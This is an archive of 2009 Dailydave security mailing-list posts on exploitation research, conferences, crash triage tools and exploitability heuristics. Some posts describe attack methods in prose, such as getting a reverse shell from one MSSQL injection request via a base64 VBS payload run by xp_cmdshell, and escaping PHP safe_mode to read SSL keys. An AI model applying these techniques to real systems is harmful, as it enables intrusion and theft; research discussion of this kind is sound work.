From ferruh at mavituna.com Fri Jul 3 06:49:51 2009 From: ferruh at mavituna.com (Ferruh Mavituna) Date: Fri, 3 Jul 2009 11:49:51 +0100 Subject: [Dailydave] One Click Ownage [White Paper and Scripts] Message-ID: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com> This is a different and more practical approach to get a reverse shell or code execution in SQL Injections (*particularly in MSSQL*). The idea is simple. Getting a reverse shell from an SQL Injection with one HTTP request without using an extra channel such as TFTP, FTP to upload the initial payload. White paper explains the steps and the details of the attack. Scripts got all the tools you need to create your HTTP request with your own payload. *White Paper: *http://ferruh.mavituna.com/papers/oneclickownage.pdf *Scripts: *http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip *Presentation (IT Underground 2009): *http://www.slideshare.net/fmavituna/one-click-ownage-1660539 Regards, -- http://ferruh.mavituna.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090703/af32dec9/attachment.htm From dave at kof.immunityinc.com Fri Jul 3 07:06:06 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Fri, 3 Jul 2009 07:06:06 -0400 Subject: [Dailydave] Citrix, PHP, SyScan, Message-ID: <4e1ef3e50907030406s6221dce1mc749856dc88201f3@mail.gmail.com> The sign of a good hacker is often that they make it look really stinkin' easy. Like today at SyScan 09 (Singapore) Brett Moore went from "remote anonymous" to "domain admin" in about 5 clicks using various Citrixy things (live demos are fun!). As he says "You can explain this stuff all day, but when network admins actually see you do it, that's when they learn". Likewise, Steffan Esser pointed out that he had released a bugclass in PHP (that helps you bypass Safe Mode) back in his "month of PHP bugs". But when he goes through the thousand circumstantial steps of how you exploit it reliably (his exploit worked smoothly against PHP x86 and x64 in his demo) it makes a lot more sense. The basic theory of his work (as I understand it) is this: The PHP engine's code does not take proper account into the idea that types of PHP variables can be changed during a function's execution. So for example, you use the "explode" function but while it's exploding you change a variable in the hashtable and (via some magic) you can then get a nice information leak. A similar bug results in creation of a string with size of 2 gigs and startging memory address of 0. This means you can do things like my_fake_string[0x41414141]=0; to write to that address in memory. Via some parsing (work goes here) you can turn off safe_mode, fix the removed functions, and get out of PHP jails in all senses of the term. The other side benefit is that when you are running PHP in a common setup, with SSL and mod_php, you can then read the process's memory to recover the SSL private key. Thsi is one time when MS's use of LSASS for storing private keys and doing all the crypto makes sense! Anyways, more on the talks later - next up is SyScan Taiwan! -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090703/8aac95bc/attachment.htm From dave at kof.immunityinc.com Fri Jul 3 23:09:47 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Fri, 3 Jul 2009 23:09:47 -0400 Subject: [Dailydave] One Click Ownage [White Paper and Scripts] In-Reply-To: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com> References: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com> Message-ID: <4e1ef3e50907032009j364d7f72nfd5b8a049e1ed6fd@mail.gmail.com> To sum up the paper: You base64 a callback executable into a VBS script and then send it over to be executed by xp.cmdshell. What would be more useful, since DB servers are rarely routable to the internet, is something that injects into SQL Server and then can be talked to with MOSDEF or some other ping-pong protocol via the initial SQL Injection so you can get real access to the DB layer. This wouldn't be that hard really. -dave On Fri, Jul 3, 2009 at 6:49 AM, Ferruh Mavituna wrote: > This is a different and more practical approach to get a reverse shell or > code execution in SQL Injections (*particularly in MSSQL*). The idea is > simple. Getting a reverse shell from an SQL Injection with one HTTP request > without using an extra channel such as TFTP, FTP to upload the initial > payload. > > White paper explains the steps and the details of the attack. Scripts got > all the tools you need to create your HTTP request with your own payload. > > > *White Paper: > *http://ferruh.mavituna.com/papers/oneclickownage.pdf > > *Scripts: > *http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip > > *Presentation (IT Underground 2009): > *http://www.slideshare.net/fmavituna/one-click-ownage-1660539 > > > > Regards, > > > -- > http://ferruh.mavituna.com > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090703/49fbd802/attachment.htm From ferruh at mavituna.com Sat Jul 4 04:59:04 2009 From: ferruh at mavituna.com (Ferruh Mavituna) Date: Sat, 4 Jul 2009 09:59:04 +0100 Subject: [Dailydave] One Click Ownage [White Paper and Scripts] In-Reply-To: <4e1ef3e50907032009j364d7f72nfd5b8a049e1ed6fd@mail.gmail.com> References: <6dc88c3c0907030349i310c006duf525a326ba6f614@mail.gmail.com> <4e1ef3e50907032009j364d7f72nfd5b8a049e1ed6fd@mail.gmail.com> Message-ID: <6dc88c3c0907040159w5d7b457we20e25f045e9cc1a@mail.gmail.com> > > To sum up the paper: You base64 a callback executable into a VBS script and > then send it over to be executed by xp.cmdshell. Yeah, whole idea was making it easier and making it easier allows to carry out new attacks such as combining it with CSRF. Even better you don't have to configure an application to carry out such an attack you just need to copy paste a request. So it's a big optimization over any known way to do this. is something that injects into SQL Server and then can be talked to with > MOSDEF or some other ping-pong protocol via the initial SQL Injection so you > can get real access to the DB layer. > You can send any executable you want (*if it's too big you might need to separate the request*) so you might use DNS Tunnelling. Most of the database servers still can resolve DNS so it should be all right, otherwise you stuck with less efficient ways get an interactive shell. 2009/7/4 Dave Aitel > To sum up the paper: You base64 a callback executable into a VBS script and > then send it over to be executed by xp.cmdshell. > > What would be more useful, since DB servers are rarely routable to the > internet, is something that injects into SQL Server and then can be talked > to with MOSDEF or some other ping-pong protocol via the initial SQL > Injection so you can get real access to the DB layer. This wouldn't be that > hard really. > > > -dave > > On Fri, Jul 3, 2009 at 6:49 AM, Ferruh Mavituna wrote: > >> This is a different and more practical approach to get a reverse shell or >> code execution in SQL Injections (*particularly in MSSQL*). The idea is >> simple. Getting a reverse shell from an SQL Injection with one HTTP request >> without using an extra channel such as TFTP, FTP to upload the initial >> payload. >> >> White paper explains the steps and the details of the attack. Scripts got >> all the tools you need to create your HTTP request with your own payload. >> >> >> *White Paper: >> *http://ferruh.mavituna.com/papers/oneclickownage.pdf >> >> *Scripts: >> *http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip >> >> *Presentation (IT Underground 2009): >> *http://www.slideshare.net/fmavituna/one-click-ownage-1660539 >> >> >> >> Regards, >> >> >> -- >> http://ferruh.mavituna.com >> >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> >> > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -- http://ferruh.mavituna.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090704/4e47884a/attachment-0001.htm From dave at kof.immunityinc.com Sun Jul 5 11:20:37 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Sun, 5 Jul 2009 11:20:37 -0400 Subject: [Dailydave] Connections Message-ID: <4e1ef3e50907050820s38fe0c5ag17388e2c8ef6f85e@mail.gmail.com> You forget, if you are lucky enough to spend all your time in the same office with "Senior Security Researchers" ( or traveling to conferences as some of us do) that many hackers at conferences have not met another hacker face to face in a long time. Face to face is very high bandwidth communication - much higher than the encrypted IRC most of us are used to. But it's great being able to spend, say, two fulls days talking to Marc * Sch?nefel*. His talk goes deeply over the process for creating undx, but creating the process that can with a high level of certainty reverse the binaries so you can analyze them for security issues is probably more central to his talk, and to his current "study" as a researcher. I.E. The following kinds of problems (virtual functions, optimizations) are what you're likely to find in a bytecode language. Here's how you develop the process to write code to reverse them. Now how do you optimize that process? Of course, Marc also likes to slip in various extremely geeky jokes into his conversation, almost as a test. Lots of the hackers do this - it's the initial handshake to the almost homogenous hacker language of unrestricted blasphemy. Tommorow I'm doing shellcode training with the web app again. You can teach almost anyone how to write buffer overflows, but a lifelong dedication to irreverance is harder, and without that. . . -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090705/69bbaf6e/attachment.htm From dave at kof.immunityinc.com Tue Jul 7 23:35:15 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Tue, 7 Jul 2009 23:35:15 -0400 Subject: [Dailydave] Upstream Message-ID: <4e1ef3e50907072035w3c74aa4an90e01911e4c1917a@mail.gmail.com> So exploits are hard. Not just "these days" but always hard. It's gritty low level work. Lots of people consider it "grunt work" and think they're above it or beyond it - even unconsciously. But deep down a working exploit and not a paper or presentation is still the undisputed mark of success. In a way, this is why the process works best when in teams. If people see that it's _customary_ to do the grunt work of reversing another allocation algorithm, and spending a month figuring out how to take advantage of it, then they'll do it. I'm packing to head back to the states, but here's my final thoughts on SyScan Taipei: 1. Lots more women here than at any technical conference I've been to recently. I'm not sure why. SyScan Taipei is a large conference - at least 250 people, probably more. There's a big community here, although it's hard to interact if you don't speak Chinese. 2. "Birdman", one of the speakers talked for a while about a malware classification and defense system he's been working on. It does a number of things. The talk was in Chinese, but I think I grasped most of it: 1. It goes into every process and calculates a list of the DLL's inside it, and uses inference to try to figure out which ones are explicitly requested to be there. If a DLL is in the process but not loaded explicitly, it puts it into a gray list. 2. Everything in the gray list is analyzed for behavior somehow and run through some simple heuristics. These generate some numbers. 3. The numbers are used for classification - anything similar to a known malware is classified as malware. In this sense it generates "families" of malware. It's similar to VxClass from Zynamics, but without using structural information (to my knowledge). Birdman's system has some flaws (I.e. would not catch MOSDEF, etc.) but everything does and it's not high cost in terms of resources. 3. If you get the chance, head up to the volcanoe and drink while looking down at the city. It's expensive, but awesome. -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090707/cdfe23da/attachment.htm From dave at kof.immunityinc.com Tue Jul 7 23:53:03 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Tue, 7 Jul 2009 23:53:03 -0400 Subject: [Dailydave] The inability to deliver a secure implementation is an architectural flaw. Message-ID: <4e1ef3e50907072053v40d8e8cep5e85de4a24553fe1@mail.gmail.com> Congrats to Mark Dowd and Ben Hawkes on winning the Google Native Client contest. But the google blog gives you pause: http://googlecode.blogspot.com/2009/07/native-client-security-contest-results.html So in the CLOUDBURST talk we quote the a DOD private unclassified journal as a lesson's learned: ?The Next Wave? Vol 17 No 3 - 2008 "Using seven analysts over a ten week period and with some limited input from VMware developers, we explored the ability of the core NetTop technologies ? VMware running on a Linux host ? to maintain isolation [...]. The results of this first study were encouraging ? no apparent show-stopping flaws were identified.? NetTop is a virtualization based system that establishes a "virtual air gap" between two VM's running at different classification level. When systems like that have failures, the result is strategic. It's not patchable. The article is interesting and talks about how while the technical review staff were against the idea, they got pushed over and the system was deployed "successfully"! I thought it was interesting the same verbage came from the Google Blog today re: Native Client. """ This contest helped us discover implementation errors in Native Client and some areas of our codebase we need to spend more time reviewing. More importantly, that no major architectural flaws were found provides evidence that Native Client can be made safe enough for widespread use. """ At some point someone senior at any project like this needs to quantify the level of testing that is required to build a secure product. Contests are interesting, but they're not providing evidence of architectural safety. All we learned here was that with some minor level of effort, lots of bugs can be found. That's not a good sign. Although it's impossible to prove "there's no bugs", it IS possible to decide not to do stuff you can't reasonably do. That's how you avoid getting on the "advisory treadmill". -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090707/6c6774ba/attachment.htm From halvar at gmx.de Wed Jul 8 02:24:25 2009 From: halvar at gmx.de (Halvar Flake) Date: 8 Jul 2009 08:24:25 +0200 Subject: [Dailydave] The inability to deliver a secure implementation is an architectural flaw. In-Reply-To: <4e1ef3e50907072053v40d8e8cep5e85de4a24553fe1@mail.gmail.com> References: <4e1ef3e50907072053v40d8e8cep5e85de4a24553fe1@mail.gmail.com> Message-ID: <4A543B99.2000905@gmx.de> Hey all, First of all congrats to Mark & Ben. I do find the quote from the "seven analysts over ten weeks" amusing. Clearly, nobody would ever invest more than that much work in obtaining classified information. The real beauty in NaCl is that it is certain to defeat DEP for the attacker. Not that DEP is much of an obstacle in browsers these days, but still. It'll also almost certainly allow ASLR bypass. Everyone who has even been to one of my classes has been tortured with the analogy that "writing an exploit is like trying to build a chair out of a number of random parts from the IKEA warehouse: Nothing ever fits, but the more pieces you have, the better your odds of success are". The power to first execute Javascript to perform allocations/dealloctions, coupled with the ability to load arbitrary code into the address space that is only verified under alignment assumptions violated as soon as you can perform a control hijack, does look like a jar of superglue to me. And when you have a sufficiently large jar of superglue, you can essentially build a chair out of wood shavings. Cheers, Halvar Dave Aitel wrote: > Congrats to Mark Dowd and Ben Hawkes on winning the Google Native Client > contest. But the google blog gives you pause: > http://googlecode.blogspot.com/2009/07/native-client-security-contest-results.html > > So in the CLOUDBURST talk we quote the a DOD private unclassified journal as > a lesson's learned: > > ?The Next Wave? > Vol 17 No 3 - 2008 > > "Using seven analysts over a ten week period and with some limited input > from VMware developers, we explored the ability of the core NetTop > technologies ? VMware running on a Linux host ? to maintain isolation [...]. > The results of this first study were encouraging ? no apparent show-stopping > flaws were identified.? > > NetTop is a virtualization based system that establishes a "virtual air gap" > between two VM's running at different classification level. When systems > like that have failures, the result is strategic. It's not patchable. The > article is interesting and talks about how while the technical review staff > were against the idea, they got pushed over and the system was deployed > "successfully"! > > I thought it was interesting the same verbage came from the Google Blog > today re: Native Client. > > """ > This contest helped us discover implementation errors in Native Client and > some areas of our codebase we need to spend more time reviewing. More > importantly, that no major architectural flaws were found provides evidence > that Native Client can be made safe enough for widespread use. > """ > > At some point someone senior at any project like this needs to quantify the > level of testing that is required to build a secure product. Contests are > interesting, but they're not providing evidence of architectural safety. All > we learned here was that with some minor level of effort, lots of bugs can > be found. That's not a good sign. Although it's impossible to prove "there's > no bugs", it IS possible to decide not to do stuff you can't reasonably do. > That's how you avoid getting on the "advisory treadmill". > > -dave > > > ------------------------------------------------------------------------ > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From kalvin.dai at gmail.com Tue Jul 7 23:42:21 2009 From: kalvin.dai at gmail.com (Kalvin Dai) Date: Tue, 7 Jul 2009 23:42:21 -0400 Subject: [Dailydave] Call for Papers - the 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09) Message-ID: <718372d40907072042w3700991ct468ba0cf6ed59ed8@mail.gmail.com> Dear Professor or Colleague: We apologize if you have received duplicate Call for Papers. You are invited to submit papers for the 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09). The 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09), Sponsored by IEEE CS TCSC, will be held in Chengdu, China, December 12-14, 2009. More infomation can be found in http://cs.okstate.edu/ubisafe09/ . In conjuction with the 8th IEEE International Conference on Dependable, Autonomic and Secure Computing (DASC09) and the 8th IEEE International Conference on Pervasive Intelligence and Computing(PICom09) IMPORTANT DEADLINES: Submission Deadline: Aug. 15, 2009 Author Notification: Sep. 30, 2009 Final Manuscript Due: Oct. 15, 2009 SYMPOSIUM INFORMATION: Computers are now available anytime, anywhere, by different means, and distributed unobtrusively throughout the everyday environments in which physical objects/artifacts embedded with invisible computers are sensible and networked locally and globally. Such "any" computers open tremendous opportunities to provide numerous novel services/applications in both real world and cyber spaces, and exist ubiquitously in our daily life, working, learning, traveling, entertainment, medicine, etc. Although it is yet unclear what exactly the real-cyber integrated worlds would be, there is no doubt that they must be safe. UbiSafe emphasizes the SAFE aspects for ubiquitous, pervasive, AmI, mobile, universal, embedded, wearable, augmented, invisible, hidden, context-aware, sentient, proactive, autonomic, or whatever it is called, computing. UbiSafe computing is focused on theories and technologies for ubiquitous artifacts to function safely for different purposes; for ubiquitous systems to work safely in various situations; and for ubiquitous environments to behave safely with all people. A series of challenges exist to let people benefit from ubiquitous services, and simultaneously guarantee their safety in making ubiquitous safe artifacts, systems, and environments. Following the great success of UbiSafe-07 held at Niagara Falls, Canada, 2007, the UbiSafe-09 Symposium provides a forum for engineers and scientists in academia, industry, and government to address all safety related profound challenges including technical, social, legal and ethical issues, and to present and discuss their ideas, theories, technologies, systems, tools, applications, work in progress and experience on all aspects of UbiSafe computing. Topics of particular interest include, but are not limited to: * Fundamentals - UbiSafe concepts, definitions, basic elements, models, frameworks and methodologies, human-centric paradigms, multi-disciplinary/inter-disciplinary/trans-disciplinary approaches, semantics, ontologies, UbiSafe requirements and formal specifications and validations, information assurance, etc. * Technologies - Security and privacy protection, reliability and fault tolerance, risk analysis, uncertainty and exception handling, socially intelligent agents, intuitive/natural user interface, interaction design, context-awareness, intelligent computing, service-oriented computing, hardware, software, middleware, etc. * Systems - Embedded systems, wearable systems, augmented systems, context-based systems, communication systems, safety-critical systems, survivable systems, persistent systems, autonomous/autonomic systems, proactive systems, network infrastructure, sensor networks, etc. * Applications - Smart objects, smart environments, information appliance and artifacts, everyday gadgets, robots, safety care, healthcare, medical care and services, working, learning, traveling, entertainment, case studies, etc. * Measures and Assessments - UbiSafe attributes and measures for safety, trust, faith, amenity, easiness, comfort, satisfaction and worryness, UbiSafe levels and relations, UbiSafe quality, assessment criteria and authority, subjective and objective assessment standards, evaluation methodologies, testing, measuring and monitoring tools, etc. * Human Factors and Social Issues - Human and social aspects of UbiSafe, UbiSafe sources and factors, social rules, regulations and laws, human factors, human behavior analysis, modeling of human feelings, traditional and cultural issues, ethical issues, etc. SUBMISSION INFORMATION: Submit full papers not exceeding 8 pages in PDF format (IEEE Computer Society Proceedings Manuscripts style: two columns, single-spaced), including figures and references, using 10 fonts, and number each page. You can download the IEEE CS Proceedings Author Guidelines from the following web site ftp://pubftp.computer.org/press/outgoing/proceedings/. UbiSafe-09 submission web site is at http://cse.stfx.ca/~ubisafe09/sub . PAPER PUBLICATION: Authors of accepted papers will receive guidelines on preparing and submitting the final manuscript(s) together with the notification of acceptance. The proceedings will be published by IEEE Computer Society Press. Authors of accepted papers, or at least one of them, are required to register and present their work at the conference, otherwise their papers will be removed from the digital library after the conference. Distinguished papers, after further revisions, will be published in one of the following journals: Security and Communication Networks (SCN), Journal of Autonomic and Trusted Computing (JoATC), and the Journal of Ubiquitous Computing and Intelligence (JUCI). GENERAL INFORMATION: GENERAL CHAIRS Xiaolin (Andy) Li, Oklahoma State University, USA Guojun Wang, Central South University, China Vijay Varadharajan, Macquarie University, Australia PROGRAM CHAIRS Ping Yang, SUNY Binghamton, USA Zhiwen Yu, Northwestern Polytech Univ., China Fabrizio Baiardi, University of Pisa, Italy STEERING COMMITTEE Vipin Chaudhary, University at Buffalo, SUNY, USA Jingde Cheng, Saitama University, Japan Thomas Grill, Johannes Kepler Univ. Linz, Austria Runhe Huang, Hosei University, Japan Ismail Khalil, Johannes Kepler Univ. Linz, Austria Qun Jin, Waseda University, Japan Xiaolin (Andy) Li, Oklahoma State University, USA Jianhua Ma, Hosei University, Japan Laurence T. Yang, St. Francis Xavier University, Canada Qiangfu Zhao, The University of Aizu, Japan PUBLICITY CHAIRS Xiaole Bai, Ohio State University, USA Emmanuelle Anceaume, IRISA, France PROGRAM COMMITTEE MEMBERS: See UbiSafe-09 web site: http://cs.okstate.edu/ubisafe09/ For further information please email to: ubisafe09 at googlegroups.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090707/e0054301/attachment-0001.htm From dave at kof.immunityinc.com Wed Jul 8 06:13:38 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Wed, 8 Jul 2009 06:13:38 -0400 Subject: [Dailydave] More from Taiwan Message-ID: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com> Ok, so here's the thing Ben Nagy and I were going on about at lunch. I thought I'd share it with thousands of people. Ben's problem is that he has 200,000[2] crashes in the latest Word. Word 2007 or whatever. He classifies these problems with !exploitable from Microsoft, which drops them into buckets of various sorts. But saying "This is probably exploitable"[1] or not is a really hard problem - far beyond what !exploitable is useful for. (It claims to do data tainting, but this is clearly a misnomer?). Basically it divides things into "Definitely likely to be exploitable because EIP is 41414141", "Pretty much likely to be exploitable cause we're writing to bad memory" and "Everything else". So here's my little idea (which I'm sure everyone else has had at least twice cause I'm not a special snowflake): Take each basic block and number it. Execute the program twice, once with your crashing file, and once with your template. This generates two signals, which have a stream of numbers in them (from the execution trace). Then you can do interesting things by converting to frequency domain (I.E. FFT?) and doing filtering and visualization. Ben thinks you want to attach state to your numbers too (i.e. memory and register info?). I'm not so keen on that because I think too much data can be as bad as too little, but whatever. Each to their own. I'm not sure what the interesting thing here is that magically tells you something is worth really digging into? Maybe you take your two signals, and subtract their frequencies and visualize how different they are? Throw that at a HMM/NN and make it tell you something? -dave [1] Ben: Do you have a !exploitable in Immunity Debugger? Me: Yes, it just returns true. :> [2] Literally. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090708/ac0dbf51/attachment.htm From bania.piotr at gmail.com Wed Jul 8 08:45:04 2009 From: bania.piotr at gmail.com (Piotr Bania) Date: Wed, 8 Jul 2009 14:45:04 +0200 Subject: [Dailydave] More from Taiwan References: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com> Message-ID: Yo, I think dynamic data flow analysis (including register/memory tracking (taint analysis) etc.) is something that can provide you a lot of answers in this case. Basically you can analyze how the input data (lets say a fuzzed .doc* file) influences the execution flow of a program (in this case Microsoft Word). Whenever exception happens you can test if the faulting instruction used operand(s) that was/were previously tainted (came from the input in direct or indirect way). And that's why i have created SpiderPig [1]. One of the problems here is speed, i have no idea how you are going to create execution trace, but if you are thinking about using single stepping via you debugger API i really wish you luck and lot of patience :). In my SpiderPig project i have used Virtual Code Integration technique (as explained in the article), however i am exchanging it right now for my own dynamic binary instrumentation engine (not because of speed), which should be ready when it will be ready :-) I also advice you to look on other projects that are using dynamic taint analysis. Btw. Julio Auto should speak about some data flow coolness at SOURCE Barcelona 2009[2], perhaps his talk can give you some hints too. best regards, pb [1] - http://piotrbania.com/all/spiderpig/ [2] - http://www.sourceconference.com/index.php/source-barcelona-2009/schedule ----- Original Message ----- From: "Dave Aitel" To: Sent: Wednesday, July 08, 2009 12:13 PM Subject: [Dailydave] More from Taiwan > Ok, so here's the thing Ben Nagy and I were going on about at lunch. I > thought I'd share it with thousands of people. > > Ben's problem is that he has 200,000[2] crashes in the latest Word. Word > 2007 or whatever. He classifies these problems with !exploitable from > Microsoft, which drops them into buckets of various sorts. But saying > "This > is probably exploitable"[1] or not is a really hard problem - far beyond > what !exploitable is useful for. (It claims to do data tainting, but this > is > clearly a misnomer?). Basically it divides things into "Definitely likely > to > be exploitable because EIP is 41414141", "Pretty much likely to be > exploitable cause we're writing to bad memory" and "Everything else". > > So here's my little idea (which I'm sure everyone else has had at least > twice cause I'm not a special snowflake): Take each basic block and number > it. Execute the program twice, once with your crashing file, and once with > your template. This generates two signals, which have a stream of numbers > in > them (from the execution trace). Then you can do interesting things by > converting to frequency domain (I.E. FFT?) and doing filtering and > visualization. Ben thinks you want to attach state to your numbers too > (i.e. > memory and register info?). I'm not so keen on that because I think too > much > data can be as bad as too little, but whatever. Each to their own. > > I'm not sure what the interesting thing here is that magically tells you > something is worth really digging into? Maybe you take your two signals, > and > subtract their frequencies and visualize how different they are? Throw > that > at a HMM/NN and make it tell you something? > > -dave > > [1] Ben: Do you have a !exploitable in Immunity Debugger? Me: Yes, it just > returns true. :> > [2] Literally. > -------------------------------------------------------------------------------- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From alex at sotirov.net Wed Jul 8 22:41:26 2009 From: alex at sotirov.net (Alexander Sotirov) Date: Wed, 8 Jul 2009 22:41:26 -0400 Subject: [Dailydave] Pwnie Awards 2009 Message-ID: <20090709024126.GA20511@MacBook.local> The Pwnie Awards ceremony will return for the third consecutive year to the BlackHat USA conference in Las Vegas. The award ceremony will take place during the BlackHat reception on Wed, July 29. The Pwnie Awards is an annual awards ceremony celebrating the achievements and failures of security researchers and the wider security community in the past year. We're currently accepting nominations in nine award categories: * Best Server-Side Bug * Best Client-Side Bug * Mass 0wnage * Most Innovative Research * Lamest Vendor Response * Most Overhyped Bug * Best Song * Most Epic FAIL (new for 2008) * Lifetime Achievement award for hackers over 30 (new for 2008) The deadline for nominations is Wed, July 15. To submit a nomination, visit the Pwnie Awards site at http://pwnie-awards.org/ For more last minute information, follow @PwnieAwards on Twitter, http://twitter.com/PwnieAwards For questions, please email info at pwnie-awards.org Alexander Sotirov Dino Dai Zovi Pwnie Awards 2009 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090708/6cd6d8e8/attachment.pgp From ayao at apple.com Wed Jul 8 16:10:03 2009 From: ayao at apple.com (Drew Yao) Date: Wed, 8 Jul 2009 13:10:03 -0700 Subject: [Dailydave] Announcing CrashWrangler Message-ID: <5A3761D1-EE6B-46FC-A7EF-124CA2C10AD5@apple.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, Apple recently released the new CrashWrangler tools to anyone with a free ADC account, and is available at: https://connect.apple.com/cgi-bin/WebObjects/MemberSite.woa/wa/getSoftware?bundleID=20390 ... or just look for it in the downloads section of http://connect.apple.com/ under Mac OS X. CrashWrangler is a set of developer tools that help in creating and debugging secure Mac OS X applications. The tools work by inspecting the application's state at the time of the crash, as well as the application crash logs. Using these tools on a reproducible test case can determine if a crash could lead to a potentially exploitable security issue, while providing valuable data to fix these issues. Additionally, any crash log can be inspected to determine if it is a duplicate of a known crash. The CrashWrangler tools support Mac OS X 10.5 or later. It should be understood that CrashWrangler uses advanced heuristics, but that false positives and false negatives are possible. It's intended for quick assessment. As always, a detailed manual inspection is the only way to be sure something is or isn't exploitable. The basic algorithm for determining exploitability looks like this. Exploitable if: Crash on write instruction Crash executing invalid address Crash calling an invalid address Crash accessing an uninitialized or freed pointer as indicated by using the MallocScribble environment variable Illegal instruction exception Abort due to -fstack-protector, _FORTIFY_SOURCE, heap corruption detected Stack trace of crashing thread contains certain functions such as malloc, free, szone_error, objc_MsgSend, etc. Not exploitable if: Divide by zero exception Stack grows too large due to recursion Null dereference Other abort Crash on read instruction If a crash is determined to be non-exploitable, it's recommended to run the test case again with libgmalloc(3) on with MALLOC_ALLOW_READS and MALLOC_FILL_SPACE set, and see if the crash changes to one that is considered to be exploitable. CrashWrangler does not send any data about your crash to Apple or anyone else. Note that it does forward the information about the crash to CrashReporter, which is part of the OS, and as always it will send info to Apple if and only if you click the "Send to Apple" button in the Crash Reporter dialog. Drew Yao Apple Product Security PGP key at https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) iQEcBAEBAgAGBQJKVPvyAAoJEHkodeiKZIkB6noIALzqIdAZi7K9bFHwN20lH28Z HpjePhTPf6a+B2eOkB8/TmZqFGN6A7wGLzTNfCJJHrYQ3E/r2grDznBxqOCqSs7F EvVk3AHkkW3kvUTpzo3kxOQYJtLB2Le1tvAicIlvSOgaep7JDYXVS97znETWGpGC ewHCNgcF7exKAWlqReJcy4GH2TPgs1p36WRPfZ2lpwN2K5z1MsPq9BRzvsP0udCc 0OWDrQeI6L2FcTqVzfG8q5YTrXqKius8veMQIrp5lc33rAgQwZSTfagR6rZ30RKM 7d593tDlKOmW6uvwO7JvWMriDtJR+rVmzPr6uSK4H/k5oT6HlB0U/2M/aK2V7+A= =9zg8 -----END PGP SIGNATURE----- From version5 at gmail.com Wed Jul 8 17:21:43 2009 From: version5 at gmail.com (nnp) Date: Wed, 8 Jul 2009 22:21:43 +0100 Subject: [Dailydave] More from Taiwan In-Reply-To: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com> References: <4e1ef3e50907080313g1ec26eebl48f2c2784b0be3c3@mail.gmail.com> Message-ID: <28749c0e0907081421k3cf22b98nb841fba71f881356@mail.gmail.com> It's quite a difficult problem really, to give an answer that is correct a large percentage of the time without getting sucked into more heavyweight analysis i.e. dataflow and path conditions. One approach is to go the whole way and just try to generate an exploit, but this gets rather complicated quite quickly, and involves a lot of analysis that isn't going to be feasible to run for 200,000 test cases (I'm currently looking at ~1 hour for a single input on VLC) Especially with things like heap overflows, the determining factor on whether a bug is exploitable or not might not even be obvious from the path executed by the fuzz file. You may need to also analyse how much memory massaging you can do; an automated solution for which is probably going to need a pretty complicated dynamic/static analysis tool implementing something like [1], among other stuff. (I do have a tendency to overcomplicate things though, so I'd love to hear more hackish solutions) Given the sheer number of crashes Ben has, there seems to be a real opportunity to see if there are paramaters of an executed path that make the paths cluster into groups that are exploitable and not exploitable. One option is to use a NN optimising over some paramaters of a path, although the requirement for training data might be prohibitive. There are similar clustering algorithms that don't have this exact drawback though. What I have in mind is something like the vector space model used to classify similarity between documents. A calculation is run on each path to give its position in the vector space and then clusters can be assigned manually, or via something like the k-means algorithm [2] The real trick/problem is in coming up with measurable properties of a single path that when this calculation is run, places it in/around the correct cluster. Basic blocks executed is one, perhaps assigning unique numbers to loops and using the number of times the loop is executed might be another... any other ideas? [1] http://bitblaze.cs.berkeley.edu/papers/EECS-2009-34.pdf [2] http://en.wikipedia.org/wiki/K-means_clustering On Wed, Jul 8, 2009 at 11:13 AM, Dave Aitel wrote: > Ok, so here's the thing Ben Nagy and I were going on about at lunch. I > thought I'd share it with thousands of people. > > Ben's problem is that he has 200,000[2] crashes in the latest Word. Word > 2007 or whatever. He classifies these problems with !exploitable from > Microsoft, which drops them into buckets of various sorts. But saying "This > is probably 